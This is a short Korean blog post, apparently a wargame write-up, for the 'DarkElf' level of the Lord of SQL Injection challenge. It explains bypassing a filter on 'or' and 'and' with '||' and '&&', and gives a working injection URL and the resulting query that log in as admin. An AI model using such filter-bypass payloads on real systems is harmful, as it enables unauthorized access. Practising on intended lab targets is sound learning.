Lord Of SQL Injection [ 6.DarkElf ]
2017. 9. 8. 21:45ㆍWebHacking/Lord of SQL injection
preg_match함수에서 or , and 사용을 막아두고있다
or와 and를 대체할 수 있는 문자를 찾아야한다
or => " || "
and => " && " , &&는 URL에서 변수구분자로 사용하고 있으므로 아스키코드 26을 사용하도록 한다 => %26
URL: https://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php?pw=9999' || id='admin' %23 |
=> SELECT id FROM prob_darkelf WHERE ( id='guest' and pw='9999' ) || id='admin' #'
'WebHacking > Lord of SQL injection' 카테고리의 다른 글
Lord Of SQL Injection [ 10.Skeleton ] (0) | 2017.09.12 |
---|---|
Lord Of SQL Injection [ 7.Orge ] (0) | 2017.09.12 |
Lord Of SQL Injection [ 5. Wolfman] (0) | 2017.09.08 |
Lord Of SQL injection [ 4.Orc ] (0) | 2017.09.08 |
Lord Of SQL injection [3.Goblin ] (0) | 2017.09.08 |